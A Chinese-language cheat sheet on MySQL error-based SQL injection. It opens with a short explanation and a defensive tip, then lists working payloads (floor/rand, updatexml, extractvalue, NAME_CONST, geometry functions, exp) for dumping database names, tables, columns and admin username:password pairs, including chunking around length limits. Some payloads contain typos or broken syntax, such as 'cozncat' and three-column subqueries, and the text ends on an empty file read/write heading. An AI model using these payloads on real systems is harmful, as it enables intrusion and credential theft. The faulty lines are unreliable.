报错注入
MySQL 执行 SQL 语句时,如果语句有错,mysql_error() 会返回报错信息;报错注入正是依赖应用把这段数据库错误信息回显到页面。不过 MySQL 与 PHP 结合使用时,默认并不会把报错信息显示在页面上,只有应用自己输出了 mysql_error() 的结果,错误内容才会泄露出来。因此,防御上应关闭生产环境的数据库错误回显(只记录到服务端日志),并对所有拼接进 SQL 的用户输入改用参数化查询。
判断注入
and 1=1
and 1=2
单引号引起报错

暴库
id=info()将会得到当前的库名,target_sys库中的这个表不存在

去重 distinct
and updatexml(1,concat(0x7e,(SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1),0x7e),1)
and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
and extractvalue(1, concat(0x7e,(SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1)))
通过floor报错
当前用户
and(select 1 from (select count(*),concat((select(select(select concat(0x7e,user(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
数据库版本
and(select 1,2,3 from (select count(*),concat((select(select(select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
爆库
and(select 1,2,3 from (select count(*),concat((select(select(select concat(0x7e,schema_name,0x7e) from information_schema.schemata limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
爆表
and(select 1,2,3 from (select count(*),concat((select(select(select concat(0x7e,table_name,0x7e) from information_schema.tables where table_schema=database() limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
爆数据
and(SELECT 1 FROM (select count(*),concat((select(select concat(0x7e,username,0x7e,password,0x7e) from admin limit 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) limit 0,1
updatexml 报错(有长度限制,最长32位)
and updatexml(1,concat(0x7e,(payload),0x7e),1)
爆数据库版本
and updatexml(1,concat(0x7e,(select version()),0x7e),1)
爆表名
and updatexml(1,concat(0x7e,(select distinct concat(0x7e,table_name,0x7e) from information_schema.tables where table_schema=database() limit 0,1),0x7e),1)
爆字段
and updatexml(1,concat(0x7e,(select concat(0x7e,column_name,0x7e) from information_schema.columns where table_name='admin' limit 0,1),0x7e),1)
爆数据
and updatexml(1,concat(0x7e,(select concat(0x7e,username,0x7e,password) from admin limit 0,1),0x7e),1)
因为有长度限制,只能显示32位
length() 函数 可以查询长度
substring() 函数 可以截取字符串
查询长度
and updatexml(1,concat(0x7e,(select length(concat(0x7e,username,0x7e,password)) from admin limit 0,1),0x7e),1)
and updatexml(1,concat(0x7e,(select substring(concat(0x7e,username,0x7e,password),1,32) from admin limit 0,1),0x7e),1)
and updatexml(1,concat(0x7e,(select substring(concat(0x7e,username,0x7e,password),32,39) from admin limit 0,1),0x7e),1)
extractvalue报错(有长度限制,最长32位)
and extractvalue(1,concat(0x7e,(payload),0x7e))
爆用户名
and extractvalue(1,concat(0x7e,user(),0x7e))
爆表名
and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e))
爆字段
and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_name='admin' limit 0,1),0x7e))
爆数据
and extractvalue(1,concat(0x7e,(select concat(0x7e,username,0x7e,password) from admin limit 0,1),0x7e))
and extractvalue(1,concat(0x7e,(SELECT concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1)))
判断长度
and extractvalue(1,concat(0x7e,(select length(concat(0x7e,username,0x7e,password)) from admin limit 0,1),0x7e))
分批获取数据
and extractvalue(1,cozncat(0x7e,(select substring(concat(0x73,password,0x7e,username),1,32) from admin limit 0,1),0x7e))
and extractvalue(1,concat(0x7e,(select substring(concat(0x73,password,0x7e,username),32,39) from admin limit 0,1),0x7e))
还有一些其他的报错方式
NAME_CONST(适用于低版本)
and 1=(select * from (select+NAME_CONST(version(),1),NAME_CONST(version(),1)) as x)--
geometrycollection()
select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));
multipoint()
select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));
polygon()
select * from test where id=1 and polygon((select * from(select * from(select user())a)b));
multipolygon()
select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));
linestring()
select * from test where id=1 and linestring((select * from(select * from(select user())a)b));
multilinestring()
select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));
exp()
select * from test where id=1 and exp(~(select * from(select user())a));
报错注入读写文件